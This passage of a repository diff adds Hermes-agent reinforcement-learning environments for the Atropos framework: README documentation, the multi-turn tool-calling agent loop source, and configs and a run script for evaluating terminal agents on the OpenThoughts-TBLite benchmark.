- **Cleanup**: `cleanup()` -- release all resources (called automatically after `compute_reward`)
### Patches (`patches.py`)
**Problem**: Some hermes-agent tools use `asyncio.run()` internally (e.g., mini-swe-agent's Modal backend via SWE-ReX). This crashes when called from inside Atropos's event loop because `asyncio.run()` cannot be nested.
**Solution**: `patches.py` monkey-patches `SwerexModalEnvironment` to use a dedicated background thread (`_AsyncWorker`) with its own event loop. The calling code sees the same sync interface, but internally the async work happens on a separate thread that doesn't conflict with Atropos's loop.
What gets patched:
- `SwerexModalEnvironment.__init__` -- creates Modal deployment on a background thread
- `SwerexModalEnvironment.execute` -- runs commands on the same background thread
- `SwerexModalEnvironment.stop` -- stops deployment on the background thread
The patches are:
- **Idempotent** -- calling `apply_patches()` multiple times is safe
- **Transparent** -- same interface and behavior, only the internal async execution changes
- **Universal** -- works identically in normal CLI use (no running event loop)
Applied automatically at import time by `hermes_base_env.py`.
### Tool Call Parsers (`tool_call_parsers/`)
Client-side parsers that extract structured `tool_calls` from raw model output text. Used in **Phase 2** (VLLM server type) where ManagedServer's `/generate` endpoint returns raw text without tool call parsing.
Each parser is a standalone reimplementation of the corresponding VLLM parser's `extract_tool_calls()` logic. No VLLM dependency -- only standard library (`re`, `json`, `uuid`) and `openai` types.
Available parsers:
- `hermes` -- Hermes/ChatML `<tool_call>` XML format
- `mistral` -- Mistral `[TOOL_CALLS]` format
- `llama3_json` -- Llama 3 JSON tool calling
- `qwen` -- Qwen tool calling format
- `qwen3_coder` -- Qwen3 Coder format
- `deepseek_v3` -- DeepSeek V3 format
- `deepseek_v3_1` -- DeepSeek V3.1 format
- `kimi_k2` -- Kimi K2 format
- `longcat` -- Longcat format
- `glm45` / `glm47` -- GLM model formats
Usage:
```python
from environments.tool_call_parsers import get_parser
parser = get_parser("hermes")
content, tool_calls = parser.parse(raw_model_output)
```
In Phase 1 (OpenAI server type), these parsers are not needed -- the server handles tool call parsing natively.
## Two-Phase Operation
### Phase 1: OpenAI Server (Evaluation / SFT Data Generation)
Uses `server.chat_completion()` with `tools=` parameter. The server (VLLM, SGLang, OpenRouter, OpenAI) handles tool call parsing natively. Returns `ChatCompletion` objects with structured `tool_calls`.
- Good for: evaluation, SFT data generation, testing
- Run with: `serve` (with `run-api`), `process`, or `evaluate` subcommands
- Placeholder tokens are created for the Atropos pipeline
### Phase 2: VLLM ManagedServer (Full RL Training)
Uses ManagedServer for exact token IDs + logprobs via `/generate`. Client-side tool call parser (from `tool_call_parsers/`) reconstructs structured `tool_calls` from raw output.
- Good for: full RL training with GRPO/PPO
- Run with: `serve` subcommand
- Real tokens, masks, and logprobs flow through the pipeline
## Directory Structure
```
environments/
├── README.md # This file
├── __init__.py # Package exports
├── hermes_base_env.py # Abstract base (HermesAgentBaseEnv)
├── agent_loop.py # Multi-turn agent engine (HermesAgentLoop)
├── tool_context.py # Per-rollout tool access for reward functions
├── patches.py # Async-safety patches for Modal backend
├── tool_call_parsers/ # Phase 2 client-side parsers
│ ├── __init__.py # Registry + base class
│ ├── hermes_parser.py
│ ├── mistral_parser.py
│ ├── llama_parser.py
│ ├── qwen_parser.py
│ ├── qwen3_coder_parser.py
│ ├── deepseek_v3_parser.py
│ ├── deepseek_v3_1_parser.py
│ ├── kimi_k2_parser.py
│ ├── longcat_parser.py
│ ├── glm45_parser.py
│ └── glm47_parser.py
├── terminal_test_env/ # Stack validation environment
│ └── terminal_test_env.py
├── hermes_swe_env/ # SWE-bench style training environment
│ └── hermes_swe_env.py
└── benchmarks/ # Evaluation benchmarks
├── terminalbench_2/ # 89 terminal tasks, Modal sandboxes
│ └── terminalbench2_env.py
├── tblite/ # 100 calibrated tasks (fast TB2 proxy)
│ └── tblite_env.py
└── yc_bench/ # Long-horizon strategic benchmark
└── yc_bench_env.py
```
## Concrete Environments
### TerminalTestEnv (`terminal_test_env/`)
A self-contained environment with inline tasks (no external dataset needed) for validating the full stack end-to-end. Each task asks the model to create a file at a known path, and the verifier checks the content matches.
```bash
# Serve mode (needs run-api)
run-api
python environments/terminal_test_env/terminal_test_env.py serve
# Process mode (no run-api, saves to JSONL)
python environments/terminal_test_env/terminal_test_env.py process \
--env.data_path_to_save_groups terminal_test_output.jsonl
```
### HermesSweEnv (`hermes_swe_env/`)
SWE-bench style training environment. The model gets a coding task, uses terminal + file + web tools to solve it, and the reward function runs tests in the same Modal sandbox.
```bash
python environments/hermes_swe_env/hermes_swe_env.py serve \
--openai.model_name YourModel \
--env.dataset_name bigcode/humanevalpack \
--env.terminal_backend modal
```
### TerminalBench2EvalEnv (`benchmarks/terminalbench_2/`)
**Eval-only** environment for the Terminal-Bench 2.0 benchmark (89 tasks). Each task gets a pre-built Docker Hub image, a natural language instruction, and a test suite. The agent uses terminal + file tools to solve the task, then the test suite verifies correctness.
Follows the standard Atropos eval pattern (like GPQA, MMLU, etc.):
- Run via `evaluate` subcommand (no `run-api` needed)
- `setup()` loads the dataset, `evaluate()` runs all tasks
- `rollout_and_score_eval()` handles per-task agent loop + test verification
- Downloads verifier output locally for reliable reward checking (Harbor pattern)
```bash
# Run full benchmark
python environments/benchmarks/terminalbench_2/terminalbench2_env.py evaluate \
--openai.model_name anthropic/claude-opus-4.6
# Run subset of tasks
python environments/benchmarks/terminalbench_2/terminalbench2_env.py evaluate \
--openai.model_name anthropic/claude-opus-4.6 \
--env.task_filter fix-git,git-multibranch
# Skip specific tasks
python environments/benchmarks/terminalbench_2/terminalbench2_env.py evaluate \
--openai.model_name anthropic/claude-opus-4.6 \
--env.skip_tasks heavy-task,slow-task
```
## Creating a New Environment
### Training Environment
1. Create a new directory under `environments/`
2. Create your env file inheriting from `HermesAgentBaseEnv`
3. Implement the four abstract methods + `evaluate()`
```python
from environments.hermes_base_env import HermesAgentBaseEnv, HermesAgentEnvConfig
class MyEnvConfig(HermesAgentEnvConfig):
pass # Add custom fields as needed
class MyEnv(HermesAgentBaseEnv):
name = "my-env"
env_config_cls = MyEnvConfig
@classmethod
def config_init(cls):
env_config = MyEnvConfig(
enabled_toolsets=["terminal", "file"],
terminal_backend="modal",
# ... other config
)
server_configs = [APIServerConfig(...)]
return env_config, server_configs
async def setup(self):
self.dataset = load_dataset(...)
self.iter = 0
async def get_next_item(self):
item = self.dataset[self.iter % len(self.dataset)]
self.iter += 1
return item
def format_prompt(self, item):
return item["instruction"]
async def compute_reward(self, item, result, ctx):
# ctx gives you full tool access to the rollout's sandbox
test = ctx.terminal("pytest -v")
return 1.0 if test["exit_code"] == 0 else 0.0
async def evaluate(self, *args, **kwargs):
# Periodic evaluation logic
...
if __name__ == "__main__":
MyEnv.cli()
```
### Eval-Only Environment (Benchmark)
For eval benchmarks, follow the pattern in `terminalbench2_env.py`:
1. Create under `environments/benchmarks/your-benchmark/`
2. Inherit from `HermesAgentBaseEnv`
3. Set eval-only config: `eval_handling=STOP_TRAIN`, `steps_per_eval=1`, `total_steps=1`
4. Stub the training methods (`collect_trajectories`, `score`)
5. Implement `rollout_and_score_eval()` and `evaluate()`
6. Run with `evaluate` subcommand
## Key Config Fields
| Field | Description | Default |
|-------|-------------|---------|
| `enabled_toolsets` | Which hermes toolsets to enable | `None` (all) |
| `disabled_toolsets` | Toolsets to disable | `None` |
| `distribution` | Probabilistic toolset distribution name | `None` |
| `max_agent_turns` | Max LLM calls per rollout | `30` |
| `agent_temperature` | Sampling temperature | `1.0` |
| `terminal_backend` | `local`, `docker`, `modal`, `daytona`, `ssh`, `singularity` | `local` |
| `system_prompt` | System message for the agent | `None` |
| `tool_call_parser` | Parser name for Phase 2 | `hermes` |
| `eval_handling` | `STOP_TRAIN`, `LIMIT_TRAIN`, `NONE` | `STOP_TRAIN` |

36
environments/__init__.py Normal file
View File

@@ -0,0 +1,36 @@
"""
Hermes-Agent Atropos Environments
Provides a layered integration between hermes-agent's tool-calling capabilities
and the Atropos RL training framework.
Core layers:
- agent_loop: Reusable multi-turn agent loop with standard OpenAI-spec tool calling
- tool_context: Per-rollout tool access handle for reward/verification functions
- hermes_base_env: Abstract base environment (BaseEnv subclass) for Atropos
- tool_call_parsers: Client-side tool call parser registry for Phase 2 (VLLM /generate)
Concrete environments:
- terminal_test_env/: Simple file-creation tasks for testing the stack
- hermes_swe_env/: SWE-bench style tasks with Modal sandboxes
Benchmarks (eval-only):
- benchmarks/terminalbench_2/: Terminal-Bench 2.0 evaluation
"""
try:
from environments.agent_loop import AgentResult, HermesAgentLoop
from environments.tool_context import ToolContext
from environments.hermes_base_env import HermesAgentBaseEnv, HermesAgentEnvConfig
except ImportError:
# atroposlib not installed — environments are unavailable but
# submodules like tool_call_parsers can still be imported directly.
pass
__all__ = [
"AgentResult",
"HermesAgentLoop",
"ToolContext",
"HermesAgentBaseEnv",
"HermesAgentEnvConfig",
]

498
environments/agent_loop.py Normal file
View File

@@ -0,0 +1,498 @@
"""
HermesAgentLoop -- Reusable Multi-Turn Agent Engine
Runs the hermes-agent tool-calling loop using standard OpenAI-spec tool calling.
Works with any server that returns ChatCompletion objects with tool_calls:
- Phase 1: OpenAI server type (VLLM, SGLang, OpenRouter, OpenAI API)
- Phase 2: ManagedServer with client-side tool call parser
The loop passes tools= and checks response.choices[0].message.tool_calls,
identical to hermes-agent's run_agent.py. Tool execution is dispatched via
handle_function_call() from model_tools.py.
"""
import asyncio
import concurrent.futures
import json
import logging
import os
import uuid
from dataclasses import dataclass, field
from typing import Any, Dict, List, Optional, Set
from model_tools import handle_function_call
# Thread pool for running sync tool calls that internally use asyncio.run()
# (e.g., mini-swe-agent's modal/docker/daytona backends). Running them in a separate
# thread gives them a clean event loop so they don't deadlock inside Atropos's loop.
# Size must be large enough for concurrent eval tasks (e.g., 89 TB2 tasks all
# making tool calls). Too small = thread pool starvation, tasks queue for minutes.
# Resized at runtime by HermesAgentBaseEnv.__init__ via resize_tool_pool().
_tool_executor = concurrent.futures.ThreadPoolExecutor(max_workers=128)
def resize_tool_pool(max_workers: int):
"""
Replace the global tool executor with a new one of the given size.
Called by HermesAgentBaseEnv.__init__ based on config.tool_pool_size.
Safe to call before any tasks are submitted.
"""
global _tool_executor
_tool_executor = concurrent.futures.ThreadPoolExecutor(max_workers=max_workers)
logger.info("Tool thread pool resized to %d workers", max_workers)
logger = logging.getLogger(__name__)
@dataclass
class ToolError:
"""Record of a tool execution error during the agent loop."""
turn: int # Which turn the error occurred on
tool_name: str # Which tool was called
arguments: str # The arguments passed (truncated)
error: str # The error message
tool_result: str # The raw result returned to the model
@dataclass
class AgentResult:
"""Result of running the agent loop."""
# Full conversation history in OpenAI message format
messages: List[Dict[str, Any]]
# ManagedServer.get_state() if available (Phase 2), None otherwise
managed_state: Optional[Dict[str, Any]] = None
# How many LLM calls were made
turns_used: int = 0
# True if model stopped calling tools naturally (vs hitting max_turns)
finished_naturally: bool = False
# Extracted reasoning content per turn (from PR #297 helpers)
reasoning_per_turn: List[Optional[str]] = field(default_factory=list)
# Tool errors encountered during the loop
tool_errors: List[ToolError] = field(default_factory=list)
def _extract_reasoning_from_message(message) -> Optional[str]:
"""
Extract reasoning content from a ChatCompletion message.
Handles multiple provider formats:
1. message.reasoning_content field (some providers)
2. message.reasoning field (some providers)
3. message.reasoning_details[].text (OpenRouter style)
Note: <think> block extraction from content is NOT done here -- that's
handled by the response already in Phase 1 (server does it) or by
ManagedServer's patch in Phase 2.
Args:
message: The assistant message from ChatCompletion response
Returns:
Extracted reasoning text, or None if not found
"""
# Check reasoning_content field (common across providers)
if hasattr(message, "reasoning_content") and message.reasoning_content:
return message.reasoning_content
# Check reasoning field
if hasattr(message, "reasoning") and message.reasoning:
return message.reasoning
# Check reasoning_details (OpenRouter style)
if hasattr(message, "reasoning_details") and message.reasoning_details:
for detail in message.reasoning_details:
if hasattr(detail, "text") and detail.text:
return detail.text
if isinstance(detail, dict) and detail.get("text"):
return detail["text"]
return None
class HermesAgentLoop:
"""
Runs hermes-agent's tool-calling loop using standard OpenAI-spec tool calling.
Same pattern as run_agent.py:
- Pass tools= to the API
- Check response.choices[0].message.tool_calls
- Dispatch via handle_function_call()
Works identically with any server type -- OpenAI, VLLM, SGLang, OpenRouter,
or ManagedServer with a parser. The server determines how tool_calls get
populated on the response.
"""
def __init__(
self,
server,
tool_schemas: List[Dict[str, Any]],
valid_tool_names: Set[str],
max_turns: int = 30,
task_id: Optional[str] = None,
temperature: float = 1.0,
max_tokens: Optional[int] = None,
extra_body: Optional[Dict[str, Any]] = None,
):
"""
Initialize the agent loop.
Args:
server: Server object with chat_completion() method (OpenAIServer,
ManagedServer, ServerManager, etc.)
tool_schemas: OpenAI-format tool definitions from get_tool_definitions()
valid_tool_names: Set of tool names the model is allowed to call
max_turns: Maximum number of LLM calls before stopping
task_id: Unique ID for terminal/browser session isolation
temperature: Sampling temperature for generation
max_tokens: Max tokens per generation (None for server default)
extra_body: Extra parameters passed to the OpenAI client's create() call.
Used for OpenRouter provider preferences, transforms, etc.
e.g. {"provider": {"ignore": ["DeepInfra"]}}
"""
self.server = server
self.tool_schemas = tool_schemas
self.valid_tool_names = valid_tool_names
self.max_turns = max_turns
self.task_id = task_id or str(uuid.uuid4())
self.temperature = temperature
self.max_tokens = max_tokens
self.extra_body = extra_body
async def run(self, messages: List[Dict[str, Any]]) -> AgentResult:
"""
Execute the full agent loop using standard OpenAI tool calling.
Args:
messages: Initial conversation messages (system + user).
Modified in-place as the conversation progresses.
Returns:
AgentResult with full conversation history, managed state, and metadata
"""
reasoning_per_turn = []
tool_errors: List[ToolError] = []
# Per-loop TodoStore for the todo tool (ephemeral, dies with the loop)
from tools.todo_tool import TodoStore, todo_tool as _todo_tool
_todo_store = TodoStore()
# Extract user task from first user message for browser_snapshot context
_user_task = None
for msg in messages:
if msg.get("role") == "user":
content = msg.get("content", "")
if isinstance(content, str) and content.strip():
_user_task = content.strip()[:500] # Cap to avoid huge strings
break
import time as _time
for turn in range(self.max_turns):
turn_start = _time.monotonic()
# Build the chat_completion kwargs
chat_kwargs = {
"messages": messages,
"n": 1,
"temperature": self.temperature,
}
# Only pass tools if we have them
if self.tool_schemas:
chat_kwargs["tools"] = self.tool_schemas
# Only pass max_tokens if explicitly set
if self.max_tokens is not None:
chat_kwargs["max_tokens"] = self.max_tokens
# Inject extra_body for provider-specific params (e.g., OpenRouter
# provider preferences like banned/preferred providers, transforms)
if self.extra_body:
chat_kwargs["extra_body"] = self.extra_body
# Make the API call -- standard OpenAI spec
api_start = _time.monotonic()
try:
response = await self.server.chat_completion(**chat_kwargs)
except Exception as e:
api_elapsed = _time.monotonic() - api_start
logger.error("API call failed on turn %d (%.1fs): %s", turn + 1, api_elapsed, e)
return AgentResult(
messages=messages,
managed_state=self._get_managed_state(),
turns_used=turn + 1,
finished_naturally=False,
reasoning_per_turn=reasoning_per_turn,
tool_errors=tool_errors,
)
api_elapsed = _time.monotonic() - api_start
if not response or not response.choices:
logger.warning("Empty response on turn %d (api=%.1fs)", turn + 1, api_elapsed)
return AgentResult(
messages=messages,
managed_state=self._get_managed_state(),
turns_used=turn + 1,
finished_naturally=False,
reasoning_per_turn=reasoning_per_turn,
tool_errors=tool_errors,
)
assistant_msg = response.choices[0].message
# Extract reasoning content from the response (all provider formats)
reasoning = _extract_reasoning_from_message(assistant_msg)
reasoning_per_turn.append(reasoning)
# Check for tool calls -- standard OpenAI spec.
# Fallback: if response has no structured tool_calls but content
# contains raw tool call tags (e.g. <tool_call>), parse them using
# hermes-agent's standalone parsers. This handles the case where
# ManagedServer's ToolCallTranslator couldn't parse because vLLM
# isn't installed.
if (
not assistant_msg.tool_calls
and assistant_msg.content
and self.tool_schemas
and "<tool_call>" in (assistant_msg.content or "")
):
try:
from environments.tool_call_parsers import get_parser
fallback_parser = get_parser("hermes")
parsed_content, parsed_calls = fallback_parser.parse(
assistant_msg.content
)
if parsed_calls:
assistant_msg.tool_calls = parsed_calls
if parsed_content is not None:
assistant_msg.content = parsed_content
logger.debug(
"Fallback parser extracted %d tool calls from raw content",
len(parsed_calls),
)
except Exception:
pass # Fall through to no tool calls
if assistant_msg.tool_calls:
# Normalize tool calls to dicts — they may come as objects
# (OpenAI API) or dicts (vLLM ToolCallTranslator).
def _tc_to_dict(tc):
if isinstance(tc, dict):
return {
"id": tc.get("id", f"call_{uuid.uuid4().hex[:8]}"),
"type": "function",
"function": {
"name": tc.get("function", {}).get("name", tc.get("name", "")),
"arguments": tc.get("function", {}).get("arguments", tc.get("arguments", "{}")),
},
}
return {
"id": tc.id,
"type": "function",
"function": {
"name": tc.function.name,
"arguments": tc.function.arguments,
},
}
# Build the assistant message dict for conversation history
msg_dict: Dict[str, Any] = {
"role": "assistant",
"content": assistant_msg.content or "",
"tool_calls": [_tc_to_dict(tc) for tc in assistant_msg.tool_calls],
}
# Preserve reasoning_content for multi-turn chat template handling
# (e.g., Kimi-K2's template renders <think> blocks differently
# for history vs. the latest turn based on this field)
if reasoning:
msg_dict["reasoning_content"] = reasoning
messages.append(msg_dict)
# Execute each tool call via hermes-agent's dispatch
for tc in assistant_msg.tool_calls:
# Handle both object (OpenAI) and dict (vLLM) formats
if isinstance(tc, dict):
tool_name = tc.get("function", {}).get("name", tc.get("name", ""))
tool_args_raw = tc.get("function", {}).get("arguments", tc.get("arguments", "{}"))
else:
tool_name = tc.function.name
tool_args_raw = tc.function.arguments
# Validate tool name
if tool_name not in self.valid_tool_names:
tool_result = json.dumps(
{
"error": f"Unknown tool '{tool_name}'. "
f"Available tools: {sorted(self.valid_tool_names)}"
}
)
tool_errors.append(ToolError(
turn=turn + 1, tool_name=tool_name,
arguments=tool_args_raw[:200],
error=f"Unknown tool '{tool_name}'",
tool_result=tool_result,
))
logger.warning(
"Model called unknown tool '%s' on turn %d",
tool_name, turn + 1,
)
else:
# Parse arguments and dispatch
try:
args = json.loads(tool_args_raw)
except json.JSONDecodeError:
args = {}
logger.warning(
"Invalid JSON in tool call arguments for '%s': %s",
tool_name, tool_args_raw[:200],
)
try:
if tool_name == "terminal":
backend = os.getenv("TERMINAL_ENV", "local")
cmd_preview = args.get("command", "")[:80]
logger.info(
"[%s] $ %s", self.task_id[:8], cmd_preview,
)
tool_submit_time = _time.monotonic()
# Todo tool -- handle locally (needs per-loop TodoStore)
if tool_name == "todo":
tool_result = _todo_tool(
todos=args.get("todos"),
merge=args.get("merge", False),
store=_todo_store,
)
tool_elapsed = _time.monotonic() - tool_submit_time
elif tool_name == "memory":
tool_result = json.dumps({"error": "Memory is not available in RL environments."})
tool_elapsed = _time.monotonic() - tool_submit_time
elif tool_name == "session_search":
tool_result = json.dumps({"error": "Session search is not available in RL environments."})
tool_elapsed = _time.monotonic() - tool_submit_time
else:
# Run tool calls in a thread pool so backends that
# use asyncio.run() internally (modal, docker, daytona) get
# a clean event loop instead of deadlocking.
loop = asyncio.get_event_loop()
# Capture current tool_name/args for the lambda
_tn, _ta, _tid = tool_name, args, self.task_id
tool_result = await loop.run_in_executor(
_tool_executor,
lambda: handle_function_call(
_tn, _ta, task_id=_tid,
user_task=_user_task,
),
)
tool_elapsed = _time.monotonic() - tool_submit_time
# Log slow tools and thread pool stats for debugging
pool_active = _tool_executor._work_queue.qsize()
if tool_elapsed > 30:
logger.warning(
"[%s] turn %d: %s took %.1fs (pool queue=%d)",
self.task_id[:8], turn + 1, tool_name,
tool_elapsed, pool_active,
)
except Exception as e:
tool_result = json.dumps(
{"error": f"Tool execution failed: {type(e).__name__}: {str(e)}"}
)
tool_errors.append(ToolError(
turn=turn + 1, tool_name=tool_name,
arguments=tool_args_raw[:200],
error=f"{type(e).__name__}: {str(e)}",
tool_result=tool_result,
))
logger.error(
"Tool '%s' execution failed on turn %d: %s",
tool_name, turn + 1, e,
)
# Also check if the tool returned an error in its JSON result
try:
result_data = json.loads(tool_result)
if isinstance(result_data, dict):
err = result_data.get("error")
exit_code = result_data.get("exit_code")
if err and exit_code and exit_code < 0:
tool_errors.append(ToolError(
turn=turn + 1, tool_name=tool_name,
arguments=tool_args_raw[:200],
error=str(err),
tool_result=tool_result[:500],
))
except (json.JSONDecodeError, TypeError):
pass
# Add tool response to conversation
tc_id = tc.get("id", "") if isinstance(tc, dict) else tc.id
messages.append(
{
"role": "tool",
"tool_call_id": tc_id,
"content": tool_result,
}
)
turn_elapsed = _time.monotonic() - turn_start
logger.info(
"[%s] turn %d: api=%.1fs, %d tools, turn_total=%.1fs",
self.task_id[:8], turn + 1, api_elapsed,
len(assistant_msg.tool_calls), turn_elapsed,
)
else:
# No tool calls -- model is done
msg_dict = {
"role": "assistant",
"content": assistant_msg.content or "",
}
if reasoning:
msg_dict["reasoning_content"] = reasoning
messages.append(msg_dict)
turn_elapsed = _time.monotonic() - turn_start
logger.info(
"[%s] turn %d: api=%.1fs, no tools (finished), turn_total=%.1fs",
self.task_id[:8], turn + 1, api_elapsed, turn_elapsed,
)
return AgentResult(
messages=messages,
managed_state=self._get_managed_state(),
turns_used=turn + 1,
finished_naturally=True,
reasoning_per_turn=reasoning_per_turn,
tool_errors=tool_errors,
)
# Hit max turns without the model stopping
logger.info("Agent hit max_turns (%d) without finishing", self.max_turns)
return AgentResult(
messages=messages,
managed_state=self._get_managed_state(),
turns_used=self.max_turns,
finished_naturally=False,
reasoning_per_turn=reasoning_per_turn,
tool_errors=tool_errors,
)
def _get_managed_state(self) -> Optional[Dict[str, Any]]:
"""
Get ManagedServer state if the server supports it.
Returns state dict with SequenceNodes containing tokens/logprobs/masks,
or None if the server doesn't support get_state() (e.g., regular OpenAI server).
"""
if hasattr(self.server, "get_state"):
return self.server.get_state()
return None

File diff suppressed because it is too large Load Diff

View File

View File

@@ -0,0 +1,73 @@
# OpenThoughts-TBLite Evaluation Environment
This environment evaluates terminal agents on the [OpenThoughts-TBLite](https://huggingface.co/datasets/open-thoughts/OpenThoughts-TBLite) benchmark, a difficulty-calibrated subset of [Terminal-Bench 2.0](https://www.tbench.ai/leaderboard/terminal-bench/2.0).
## Source
OpenThoughts-TBLite was created by the [OpenThoughts](https://www.openthoughts.ai/) Agent team in collaboration with [Snorkel AI](https://snorkel.ai/) and [Bespoke Labs](https://bespokelabs.ai/). The original dataset and documentation live at:
- **Dataset (source):** [open-thoughts/OpenThoughts-TBLite](https://huggingface.co/datasets/open-thoughts/OpenThoughts-TBLite)
- **GitHub:** [open-thoughts/OpenThoughts-TBLite](https://github.com/open-thoughts/OpenThoughts-TBLite)
- **Blog post:** [openthoughts.ai/blog/openthoughts-tblite](https://www.openthoughts.ai/blog/openthoughts-tblite)
## Our Dataset
We converted the source into the same schema used by our Terminal-Bench 2.0 environment (pre-built Docker Hub images, base64-encoded test tarballs, etc.) and published it as:
- **Dataset (ours):** [NousResearch/openthoughts-tblite](https://huggingface.co/datasets/NousResearch/openthoughts-tblite)
- **Docker images:** `nousresearch/tblite-<task-name>:latest` on Docker Hub (100 images)
The conversion script is at `scripts/prepare_tblite_dataset.py`.
## Why TBLite?
Terminal-Bench 2.0 is one of the strongest frontier evaluations for terminal agents, but when a model scores near the floor (e.g., Qwen 3 8B at <1%), many changes look identical in aggregate score. TBLite addresses this by calibrating task difficulty using Claude Haiku 4.5 as a reference:
| Difficulty | Pass Rate Range | Tasks |
|------------|----------------|-------|
| Easy | >= 70% | 40 |
| Medium | 40-69% | 26 |
| Hard | 10-39% | 26 |
| Extreme | < 10% | 8 |
This gives enough solvable tasks to detect small improvements quickly, while preserving enough hard tasks to avoid saturation. The correlation between TBLite and TB2 scores is **r = 0.911**.
TBLite also runs 2.6-8x faster than the full TB2, making it practical for iteration loops.
## Usage
```bash
# Run the full benchmark
python environments/benchmarks/tblite/tblite_env.py evaluate
# Filter to specific tasks
python environments/benchmarks/tblite/tblite_env.py evaluate \
--env.task_filter "broken-python,pandas-etl"
# Use a different model
python environments/benchmarks/tblite/tblite_env.py evaluate \
--server.model_name "qwen/qwen3-30b"
```
## Architecture
`TBLiteEvalEnv` is a thin subclass of `TerminalBench2EvalEnv`. All evaluation logic (agent loop, Docker sandbox management, test verification, metrics) is inherited. Only the defaults differ:
| Setting | TB2 | TBLite |
|----------------|----------------------------------|-----------------------------------------|
| Dataset | `NousResearch/terminal-bench-2` | `NousResearch/openthoughts-tblite` |
| Tasks | 89 | 100 |
| Task timeout | 1800s (30 min) | 1200s (20 min) |
| Wandb name | `terminal-bench-2` | `openthoughts-tblite` |
## Citation
```bibtex
@software{OpenThoughts-TBLite,
author = {OpenThoughts-Agent team, Snorkel AI, Bespoke Labs},
month = Feb,
title = {{OpenThoughts-TBLite: A High-Signal Benchmark for Iterating on Terminal Agents}},
howpublished = {https://www.openthoughts.ai/blog/openthoughts-tblite},
year = {2026}
}
```

View File

@@ -0,0 +1,39 @@
# OpenThoughts-TBLite Evaluation -- Default Configuration
#
# Eval-only environment for the TBLite benchmark (100 difficulty-calibrated
# terminal tasks, a faster proxy for Terminal-Bench 2.0).
# Uses Modal terminal backend for per-task cloud-isolated sandboxes
# and OpenRouter for inference.
#
# Usage:
# python environments/benchmarks/tblite/tblite_env.py evaluate \
# --config environments/benchmarks/tblite/default.yaml
#
# # Override model:
# python environments/benchmarks/tblite/tblite_env.py evaluate \
# --config environments/benchmarks/tblite/default.yaml \
# --openai.model_name anthropic/claude-sonnet-4
env:
enabled_toolsets: ["terminal", "file"]
max_agent_turns: 60
max_token_length: 32000
agent_temperature: 0.8
terminal_backend: "modal"
terminal_timeout: 300 # 5 min per command (builds, pip install)
tool_pool_size: 128 # thread pool for 100 parallel tasks
dataset_name: "NousResearch/openthoughts-tblite"
test_timeout: 600
task_timeout: 1200 # 20 min wall-clock per task (TBLite tasks are faster)
tokenizer_name: "NousResearch/Hermes-3-Llama-3.1-8B"
use_wandb: true
wandb_name: "openthoughts-tblite"
ensure_scores_are_not_same: false
data_dir_to_save_evals: "environments/benchmarks/evals/openthoughts-tblite"
openai:
base_url: "https://openrouter.ai/api/v1"
model_name: "anthropic/claude-opus-4.6"
server_type: "openai"
health_check: false
# api_key loaded from OPENROUTER_API_KEY in .env

View File

@@ -0,0 +1,38 @@
# OpenThoughts-TBLite Evaluation -- Docker Backend (Local Compute)
#
# Runs tasks in Docker containers on the local machine.
# Sandboxed like Modal but no cloud costs. Good for dev/testing.
#
# Usage:
# python environments/benchmarks/tblite/tblite_env.py evaluate \
# --config environments/benchmarks/tblite/local.yaml
#
# # Override concurrency:
# python environments/benchmarks/tblite/tblite_env.py evaluate \
# --config environments/benchmarks/tblite/local.yaml \
# --env.eval_concurrency 4
env:
enabled_toolsets: ["terminal", "file"]
max_agent_turns: 60
max_token_length: 32000
agent_temperature: 0.8
terminal_backend: "docker"
terminal_timeout: 300
tool_pool_size: 16
dataset_name: "NousResearch/openthoughts-tblite"
test_timeout: 600
task_timeout: 1200
eval_concurrency: 8 # max 8 tasks at once
tokenizer_name: "NousResearch/Hermes-3-Llama-3.1-8B"
use_wandb: false
wandb_name: "openthoughts-tblite-local"
ensure_scores_are_not_same: false
data_dir_to_save_evals: "environments/benchmarks/evals/openthoughts-tblite-local"
openai:
base_url: "https://openrouter.ai/api/v1"
model_name: "anthropic/claude-sonnet-4"
server_type: "openai"
health_check: false
# api_key loaded from OPENROUTER_API_KEY in .env

View File

@@ -0,0 +1,40 @@
# OpenThoughts-TBLite Evaluation -- Local vLLM Backend
#
# Runs against a local vLLM server with Docker sandboxes.
#
# Start the vLLM server from the atropos directory:
# python -m example_trainer.vllm_api_server \
# --model Qwen/Qwen3-4B-Instruct-2507 \
# --port 9001 \
# --gpu-memory-utilization 0.8 \
# --max-model-len=32000
#
# Then run:
# python environments/benchmarks/tblite/tblite_env.py evaluate \
# --config environments/benchmarks/tblite/local_vllm.yaml
env:
enabled_toolsets: ["terminal", "file"]
max_agent_turns: 60
max_token_length: 16000
agent_temperature: 0.6
terminal_backend: "docker"
terminal_timeout: 300
tool_pool_size: 16
dataset_name: "NousResearch/openthoughts-tblite"
test_timeout: 600
task_timeout: 1200
eval_concurrency: 8
tool_call_parser: "hermes"
system_prompt: "You are an expert terminal agent. You MUST use the provided tools to complete tasks. Use the terminal tool to run shell commands, read_file to read files, write_file to write files, search_files to search, and patch to edit files. Do NOT write out solutions as text - execute them using the tools. Always start by exploring the environment with terminal commands."
tokenizer_name: "Qwen/Qwen3-4B-Instruct-2507"
use_wandb: false
wandb_name: "tblite-qwen3-4b-instruct"
ensure_scores_are_not_same: false
data_dir_to_save_evals: "environments/benchmarks/evals/tblite-qwen3-4b-local"
openai:
base_url: "http://localhost:9001"
model_name: "Qwen/Qwen3-4B-Instruct-2507"
server_type: "vllm"
health_check: false

View File

@@ -0,0 +1,42 @@
#!/bin/bash
# OpenThoughts-TBLite Evaluation
#
# Run from repo root:
# bash environments/benchmarks/tblite/run_eval.sh
#
# Override model:
# bash environments/benchmarks/tblite/run_eval.sh \
# --openai.model_name anthropic/claude-sonnet-4
#
# Run a subset:
# bash environments/benchmarks/tblite/run_eval.sh \
# --env.task_filter broken-python,pandas-etl
#
# All terminal settings (backend, timeout, lifetime, pool size) are
# configured via env config fields -- no env vars needed.
set -euo pipefail
mkdir -p logs evals/openthoughts-tblite
LOG_FILE="logs/tblite_$(date +%Y%m%d_%H%M%S).log"
echo "OpenThoughts-TBLite Evaluation"
echo "Log file: $LOG_FILE"
echo ""
# Unbuffered python output so logs are written in real-time
export PYTHONUNBUFFERED=1
# Show INFO-level agent loop timing (api/tool durations per turn)
# These go to the log file; tqdm + [START]/[PASS]/[FAIL] go to terminal
export LOGLEVEL=INFO
python tblite_env.py evaluate \
--config default.yaml \
"$@" \
2>&1 | tee "$LOG_FILE"
echo ""
echo "Log saved to: $LOG_FILE"
echo "Eval results: evals/openthoughts-tblite/"

View File

@@ -0,0 +1,119 @@
"""
OpenThoughts-TBLite Evaluation Environment
